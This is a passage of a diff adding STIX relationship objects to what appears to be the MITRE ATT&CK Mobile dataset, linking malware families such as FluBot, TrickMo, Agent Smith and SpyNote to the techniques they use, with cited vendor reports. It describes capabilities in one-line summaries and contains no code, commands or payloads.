Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:10:38.672Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can use a SOCKS proxy to evade C2 IP detection.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--5ca3c7ec-55b2-4587-9376-cf6c96f8047a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d6f78e9b-94d1-4d59-b00e-89fad2261c55", + "type": "relationship", + "created": "2020-04-24T17:46:31.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020." 
+ } + ], + "modified": "2020-04-24T17:46:31.603Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) can steal pictures from the device.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c83c84e8-a556-4efe-ae24-75970ee8ad4b", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky-WUC", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) used SMS to receive command and control messages.(Citation: Kaspersky-WUC)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4ae0c45f-4ff0-4296-aaf4-c3e0d2e355e3", + "created": "2020-09-15T15:18:12.462Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason FakeSpy", + "description": "O. Almkias. (2020, July 1). 
FakeSpy Masquerades as Postal Service Apps Around the World. Retrieved September 15, 2020.", + "url": "https://www.cybereason.com/blog/fakespy-masquerades-as-postal-service-apps-around-the-world" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:42:40.327Z", + "description": "[FakeSpy](https://attack.mitre.org/software/S0509) can hide its icon if it detects that it is being run on an emulator.(Citation: Cybereason FakeSpy)", + "relationship_type": "uses", + "source_ref": "malware--838f647e-8ff8-48bd-bbd5-613cee7736cb", + "target_ref": "attack-pattern--f05fc151-aa62-47e3-ae57-2d1b23d64bf6", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--760faa7b-06cb-48b7-9103-1c52f2ca408f", + "type": "relationship", + "created": "2020-11-10T17:08:35.644Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-11-10T17:08:35.644Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has gathered device metadata, including model, manufacturer, SD card size, disk usage, memory, CPU, and serial number.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d53a8ff0-7252-477e-8767-fd485dd62e7c", + "type": "relationship", + "created": "2020-12-18T20:14:47.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-28T18:59:33.140Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has collected the device’s phone number and can check if the active network connection is metered.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--93b2474b-0ba6-469e-a4e8-d17a41d0d016", + "created": "2022-04-15T18:12:53.512Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:28:29.839Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can install attacker-specified certificates to the device's trusted certificate store, enabling an adversary to perform adversary-in-the-middle attacks.(Citation: Xiao-KeyRaider)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 
"relationship--f0851531-e554-4658-920c-f2342632c19a", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-Adware", + "description": "Michael Bentley. (2015, November 4). Lookout discovers new trojanized adware; 20K popular apps caught in the crossfire. Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2015/11/04/trojanized-adware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[ShiftyBug](https://attack.mitre.org/software/S0294) is packed with at least eight publicly available exploits that can perform rooting.(Citation: Lookout-Adware)", + "relationship_type": "uses", + "source_ref": "malware--c80a6bef-b3ce-44d0-b113-946e93124898", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e9edc13-7af7-43c4-8ec2-636b1f8cb7f1", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-BrainTest", + "description": "Chris Dehghanpoor. (2016, January 6). Brain Test re-emerges: 13 apps found in Google Play Read more: Brain Test re-emerges: 13 apps found in Google Play. 
Retrieved December 21, 2016.", + "url": "https://blog.lookout.com/blog/2016/01/06/brain-test-re-emerges/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:25:52.381Z", + "description": "[BrainTest](https://attack.mitre.org/software/S0293) uses root privileges (if available) to copy an additional Android app package (APK) to /system/priv-app to maintain persistence even after a factory reset.(Citation: Lookout-BrainTest)", + "relationship_type": "uses", + "source_ref": "malware--e13d084c-382f-40fd-aa9a-98d69e20301e", + "target_ref": "attack-pattern--4f14e30b-8b57-4a7b-9093-2c0778ea99cf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--1c180c0e-c789-4176-b568-789ada9487bb", + "type": "relationship", + "created": "2020-10-29T19:21:23.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." 
+ } + ], + "modified": "2020-10-29T19:21:23.162Z", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) can collect information about the device including device type, OS version, language, free storage space, battery status, device root, and if *developer mode* is enabled.(Citation: WeLiveSecurity AdDisplayAshas)", + "relationship_type": "uses", + "source_ref": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--de4ecfa3-fa91-4377-810c-5c567de9688b", + "created": "2021-01-05T20:16:20.490Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:38:01.842Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) can delete attacker-specified files.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ba8735ad-b9c6-4b35-9fac-d4747ab0b2ae", + "type": "relationship", + "created": "2020-11-10T17:08:35.746Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-01T19:48:44.878Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) has searched device storage for various files, including .amr files (audio recordings) and superuser binaries.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--cf28ca46-1fd3-46b4-b1f6-ec0b72361848", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4aae6ab8-2a67-4780-a69e-b15ecff7fc5d", + "created": "2023-02-28T21:43:12.487Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:43:12.487Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can make and block phone calls.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2b065fcf-7ed1-4f88-8910-2eb46bde9ab7", + "created": "2023-01-18T19:19:34.604Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:52:35.805Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can send stolen data back to the C2 server.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f5d24a31-53d2-4e84-9110-2da0582132cb", + "created": "2020-05-07T15:33:32.936Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Agent Smith](https://attack.mitre.org/software/S0440)’s core malware is disguised as a JPG file, and encrypted with an XOR cipher.(Citation: CheckPoint Agent Smith)", + "modified": "2022-04-15T16:44:17.145Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--fa801609-ca8e-415e-815e-65f3826ff4df", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c96c3405-1d9b-46e4-8f57-a6c49eb68a31", + "created": "2022-04-06T13:41:17.517Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-06T13:41:17.517Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e399430e-30b7-48c5-b70a-f44dc8c175cb", + "target_ref": "attack-pattern--74e6003f-c7f4-4047-983b-708cc19b96b6", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bf2ea132-c8f3-4ea0-8c4c-bdc95923c3b1", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. 
Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "modified": "2019-10-10T15:24:09.355Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) can activate the victim's microphone.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2acc0c1a-af30-4410-976b-31148df5378d", + "created": "2022-03-28T19:39:42.538Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-28T19:39:42.538Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4d6a900d-d1c4-4a91-bded-c9062aae384b", + "created": "2021-01-05T20:16:20.492Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler TikTok Spyware", + "description": "S. Desai. (2020, September 8). TikTok Spyware. 
Retrieved January 5, 2021.", + "url": "https://www.zscaler.com/blogs/security-research/tiktok-spyware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:47:18.774Z", + "description": "[Tiktok Pro](https://attack.mitre.org/software/S0558) has registered for device boot, incoming, and outgoing calls broadcast intents.(Citation: Zscaler TikTok Spyware)", + "relationship_type": "uses", + "source_ref": "malware--c6abcaf8-1765-41f8-9fe5-03d42fd0f6c0", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4a608d3b-aa02-4563-8b6b-c64a491856f5", + "created": "2023-03-03T16:26:20.400Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. 
Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:26:20.400Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has collected information about running processes.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--1b51f5bc-b97a-498a-8dbd-bc6b1901bf19", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3bf4b093-a1a3-48da-9236-bce9514765eb", + "created": "2022-04-05T19:46:05.853Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Samsung Keyboards", + "url": "https://support.samsungknox.com/hc/en-us/articles/360001485027-3rd-party-keyboards-must-be-whitelisted-", + "description": "Samsung. (2019, August 16). 3rd party keyboards must be whitelisted.. Retrieved September 1, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "When using Samsung Knox, third-party keyboards must be explicitly added to an allow list in order to be available to the end-user.(Citation: Samsung Keyboards)", + "modified": "2022-04-05T19:46:05.853Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--78417fce-5aaa-4ad3-a2f1-279fa18bfe45", + "created": "2023-02-06T19:47:26.528Z", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:47:26.528Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) has been distributed in obfuscated and packed form.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 
"relationship--70fa8498-6117-4e15-ae3c-f53d63996826", + "type": "relationship", + "created": "2020-06-26T15:32:25.050Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "modified": "2020-06-26T15:32:25.050Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can collect the device’s location.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c3439bdd-a0db-401b-97fd-5e2ec135a396", + "created": "2023-03-20T18:40:12.814Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:40:12.814Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3752c235-0576-47dc-b05d-d3eaeaccfecc", + "type": "relationship", + "created": "2020-12-24T21:55:56.688Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.688Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has captured audio and can record phone calls.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--188c09ee-ca3b-4bac-ad69-36489c50b5bd", + "created": "2022-04-01T18:50:00.027Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:50:00.027Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--acf8fd2a-dc98-43b4-8d37-64e10728e591", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--290a627d-172d-494d-a0cc-685f480a1034", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": 
